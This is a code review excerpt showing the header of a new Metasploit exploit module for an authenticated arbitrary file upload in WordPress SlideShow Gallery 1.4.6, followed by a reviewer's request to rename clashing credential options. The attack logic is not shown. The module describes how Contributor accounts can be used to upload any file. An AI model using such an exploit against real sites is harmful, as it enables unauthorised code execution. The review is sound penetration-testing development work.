modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb

```diff
@@ -0,0 +1,112 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::HTTP::Wordpress
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name'           => 'Wordpress SlideShow Gallery Authenticated File Upload',
+      'Description'    => %q{
+          The Wordpress SlideShow Gallery plugin contains an authenticated file upload
+          vulnerability. We can upload arbitrary files to the upload folder, because
+          the plugin also uses it's own file upload mechanism instead of the wordpress
+          api it's possible to upload any file type. The user provided does not need
+          special rights, and users with "Contributor" role can be abused.
+      },
+      'Author'         =>
+        [
+          'Jesus Ramirez Pichardo', # Vulnerability discovery
+          'Roberto Soares Espreto <robertoespreto[at]gmail.com>'     # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['CVE', '2014-5460'],
+          ['EDB', '34681'],
+        ],
+      'Privileged'     => false,
+      'Platform'       => ['php'],
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [['WP SlideShow Gallery 1.4.6', {}]],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Aug 28 2014'))
+
+    register_options(
+      [
+        OptString.new('USER', [true, 'A valid username', nil]),
```

Comment:
the http client uses `USERNAME` and `PASSWORD` for basic auth and these will be overwritten by these.
Can we rename the 2 options to `WP_USER` and `WP_PASSWORD`?